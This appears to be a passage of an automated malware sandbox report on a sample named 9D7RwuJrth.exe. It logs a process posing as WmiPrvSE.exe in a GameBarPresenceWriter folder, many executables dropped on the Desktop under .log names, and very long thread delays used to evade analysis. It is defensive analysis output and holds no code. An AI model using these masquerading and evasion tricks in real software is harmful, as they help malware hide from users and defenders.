Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1A970000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 18D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 2072
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1505
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1224
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1879
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1244

Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\haeBUeau.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RfxtYLmQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MbDxwcVz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XYaTBrrE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VNPvpVFD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aOwTdXyg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hdVuXvrH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YqcMQKie.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zuvWKvqh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ywOZehbx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HiuOyNKb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gmasiRfw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wvgrNMIh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fkHAryTS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YvkCHKYH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xBgoYyEi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fkGLlyFI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gqAKFZhr.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RoOvQmlu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CJLfMmRu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TMiCdAAw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iayrzvUL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BjyqpIYV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MsfvwPWb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zHFGLnTh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KebpbcGE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EvEoCbHu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RngMDvMV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GQJohFLp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jrYzshHe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zgMHUZTa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HGufhKgM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BwryKsoE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UAlWJNil.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\czckklIZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oTbQbbYz.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gxIrOcDq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\imHaAnxM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uILHvqzR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TideCjWs.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QfjBlGMR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IonNSomK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xJQGDhfo.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rrlpDagQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MPcmOdeg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pdjZooeB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kcQjpOfp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XujdOCGR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZDFmwSFw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nzWIOABa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QJwUIRwB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MFWOLyZB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VfEmYjln.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xtqXCEKK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SFRmUDLH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lkUrzNzM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cvCSNcGe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\brYbblpC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gGCbQipO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DpMeoAtV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lZsrLOuk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XOCTRFXH.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QnTUQpnW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cItldMID.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CvcPWQun.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NhwwQEyh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bHyKcPKg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yNVrtDVA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aghuugwS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cLlTmcma.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dsdajcUY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fnytvPjf.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LsLFRydK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tPKQwznS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BRrXbneT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ijPsrWTp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rEFrcoVj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uMlYSzCN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZWwCXoEW.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dVAarBMu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rgoKfKUN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HENwTSHn.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sUsSQXQL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YrKlkCVM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RUOvtANV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NZNelUXb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XprDnjwZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tojirtOm.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OdqVYMoD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RXHdCRrs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JpYWvPZP.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OQhlWUKC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VBmvCWAb.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\COJNZQhv.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZRpBnocC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\infrqIKS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rMoKHXwo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\smiIylww.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rNXibPjW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qKWRQFlK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IpLeIKzQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XgJlfaRK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OLjDJquB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kOAKeIBA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GfifQgAx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tLkzZqkX.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xFRjkDBd.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KrawoXqF.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ANxQZOiH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QLdDWJUZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YiicOEwG.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XQkCfxwg.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vhcgKXhJ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yWtgjqCG.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kjAKCvZY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nSHawKfi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HBUOKBdR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sOOpvBpu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QfdDtvsy.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OPbwNHKO.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jOdAThRi.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\quKhiaRV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kWkcJscF.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vVohbyWj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\guQJELZU.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JENuXwBf.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oOOAVsVq.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AVufnTwx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rAfaFgSo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SYsmfrex.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZELbGgFk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TcjfiIuK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ITFobKbD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KSAetdQl.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lHCBdANz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qQwaFPUc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JdPmuXvO.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZOCRVjRy.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\seyqUCWq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iEOtPIrO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jwQjNADO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KMHfZCnD.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AddxSDXD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mUfaJIkR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FDIxLbbR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\decjNzkA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gUkCADyL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CDLiAAVt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Hwddojgi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ocsSTCYe.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eJEjcPHs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HoTXnYtt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mRnsAsGv.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\STgXZIan.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eoNbkqdw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wipYxcGI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AEgOhmic.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eNYCHMrV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DCtffNkc.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kChIFuMg.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OzPMecrY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\niPqzeHY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qpMzVwBT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OIrVAZQe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hyUuvhPg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yCtrFDQY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jFPSHRJE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JUqyElOI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bXhLAPqc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LALnLPjB.log	Jump to dropped file

Source: C:\Users\user\Desktop\9D7RwuJrth.exe TID: 5628	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 1928	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7504	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7892	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 5840	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 8128	Thread sleep time: -922337203685477s >= -30000s
